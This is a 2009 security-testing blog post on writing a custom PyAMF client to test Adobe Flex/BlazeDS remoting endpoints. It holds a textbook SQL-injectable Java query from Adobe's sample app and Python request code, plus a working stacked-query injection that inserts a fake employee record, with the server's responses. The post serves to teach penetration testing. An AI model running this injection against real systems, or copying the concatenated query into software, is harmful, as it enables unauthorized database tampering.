Wednesday, November 11, 2009 At 10:27AM
At GDS, we’ve seen an increase over the past few months in the number of applications using Adobe Flex at the presentation layer. Vulnerabilities in Flash aside (i.e., Dowd [PDF]), this technology often presents an obstacle for security testers, especially if the application uses ActionScript Message Format (AMF) to send data across the wire. The AMF specification [PDF], has been implemented in various languages, including Java, Python, PHP, and Ruby. While there are tools out there like Burp and Deblaze which let you manipulate AMF requests, there are certain scenarios where you might want to build your own custom client for testing with AMF. Being a Python fan myself, let’s walk through the process of using the PyAMF library to quickly write a custom AMF test client.
Adobe provides several turnkey BlazeDS applications to get developers started with Flex, allowing them to use existing Java backend application logic (courtesy BlazeDS). After downloading the examples, I poked around some of the code and immediately stumbled into a textbook SQL injection vulnerability in the EmployeDAO.java class (code snippet below). This vulnerable application will serve as a perfect example for my custom test client.
public class EmployeeDAO { ..snip.. public List findEmployeesByName(String name) throws DAOException List list = new ArrayList(); Connection c = null; try { c = ConnectionHelper.getConnection(); Statement s = c.createStatement(); ResultSet rs = s.executeQuery("SELECT * FROM employee WHERE first_name LIKE '%" + name + "%' OR last_name LIKE '%" + name + "%' ORDER BY last_name"); Employee employee; while (rs.next()) ..snip..
To exploit this, we will write a client that can make requests to the remoting destination. In Python, we construct an AMF request like so using the pyamf.flex.messaging.RemotingMessage class:
request = RemotingMessage(operation="findEmployeesByName", destination="runtime-employee-ro", messageID=str(uuid.uuid4()).upper(), body=['Marcin'], clientId=None, headers={'DSId': str(uuid.uuid4()).upper(), 'DSEndpoint': 'my-amf',}, )
Then, we wrap our request in an AMF envelope:
envelope = pyamf.remoting.Envelope(amfVersion=3) envelope["/%d" % 1] = pyamf.remoting.Request(u'null', [request])
Afterwards, we need to encode our Request Envelope in AMF using pyamf.remoting.encode().
message = pyamf.remoting.encode(envelope)
Using httplib, we can send and receive HTTP requests with Python, containing our AMF encoded request in the body. We also set the Content-Type to “application/x-amf”, to specify the request is encoded in AMF, versus say, application/x-www-form-urlencoded.
conn = httplib.HTTPConnection(hostname, port) conn.request('POST', path, message.getvalue(), headers={'Content-Type': 'application/x-amf'})
Across the wire, this request looks like:
POST /samples/messagebroker/amf HTTP/1.1 Host: 172.16.247.130:8400 Accept-Encoding: identity Content-Type: application/x-amf Content-Length: 312 x00x03x00x00x00x01x00x04nullx00x02/1x00x00x00x00nx00x00 x00x01x11nx81x13Oflex.messaging.messages.RemotingMessagetbodyx11 clientIdx17destinationx0fheadersx13messageIdx13operationrsourcex15 timeToLivex13timestamptx03x01x06rMarcinx01x06'runtime-employee-ro nx0bx01tDSIdx06I7F172AA9-9172-4EE4-A6FA-A09A5C961196x15DSEndpoint x06rmy-amfx01x06ID246131C-F453-47C5-A55C-A6EE822D7BF0x06' findEmployeesByNamex01x01x01
Following, retrieve the response from our connection object, and use pyamf.remoting.decode() to decode and print the content.
response = conn.getresponse() content = response.read() content = pyamf.remoting.decode(content) print content # ----------- <Envelope amfVersion=3> (u'/1', <Request target=u'null'>[<RemotingMessage body=[u'Marcin'] source=None timestamp=None destination=u'runtime-employee-ro' clientId=None headers={'DSId': u'7F172AA9-9172-4EE4-A6FA-A09A5C961196', 'DSEndpoint': u'my-amf'} timeToLive=None messageId=u'D246131C-F453-47C5- A55C-A6EE822D7BF0' operation=u'findEmployeesByName' />]</Request>) </Envelope>
Querying the findEmployeesByName method and injecting a single quote causes a java.sql.SQLException error to be thrown.
faultString=u'flex.samples.DAOException : java.sql.SQLException: Unexpected token: % in statement [%]'
To exploit this, perform a SQL injection like any other; I’ll insert a record of my own into the database:
POST /samples/messagebroker/amf HTTP/1.1 Host: 172.16.247.130:8400 Accept-Encoding: identity Content-Length: 412 Content-Type: application/x-amf x00x03x00x00x00x01x00x04nullx00x02/1x00x00x00x00nx00x00 x00x01x11nx81x13Oflex.messaging.messages.RemotingMessagetbodyx11 clientIdx17destinationx0fheadersx13messageIdx13operationrsourcex15 timeToLivex13timestamptx03x01x06x81S\';INSERT INTO employee (first_name, last_name, title) VALUES ('Marcin', 'Wielgoszewski', 'Rogue CEO');--x01x06'runtime-employee-ronx0bx01tDSIdx06I359E2429-9CD6- 423C-AF3D-4BD3DC4E40F3x15DSEndpointx06rmy-amfx01x06IBE9315A6-A7F6- 42CE-A338-23D703573207x06'findEmployeesByNamex01x01x01
The response did not contain anything in the body, which usually is a good indicator the SQL had processed without error. Calling the findEmployeesByName method once more, with Marcin as a parameter value, returns the following data:
<flex.messaging.io.ArrayCollection [{'employeeId': 13, 'firstName': u'Marcin', 'title': u'Rogue CEO', 'lastName': u'Wielgoszewski', 'company': None, 'phone': None, 'email': None}]>
In summary, this blog post aims to demonstrate how pen testers can leverage the PyAMF library to quickly write a custom AMF test client in Python. As an interesting side note, the only method called from the client-side Flex code in the sample application is getEmployees (with no parameters). Only after reviewing the code would one see what methods are actually available to call. So even though the findEmployeesByName method was not used by the Flex application, it is vulnerable to SQL injection!
During an assessment, it’s critical that you identify all the service and method endpoints called by the application, and to also review the source code for potentially hidden methods. If you’re operating from a strictly BlackBox perspective, you should always decompile the SWF using a tool like SWFScan, and grep for RemoteObject and AMFChannel as a relatively good way to identify remoting methods. The DeBlaze tool can also performs remote service and method enumeration, which can help you identify other services and methods that aren’t exposed in the application SWF.
In my next post, I’ll show how you can reverse and create custom objects using Python and PyAMF for advanced penetration testing of Adobe Flex applications. Thanks to Adobe for providing a nice sample BlazeDS application, complete with SQL injection 🙂
Author: Marcin Wielgoszewski
©Aon plc 2023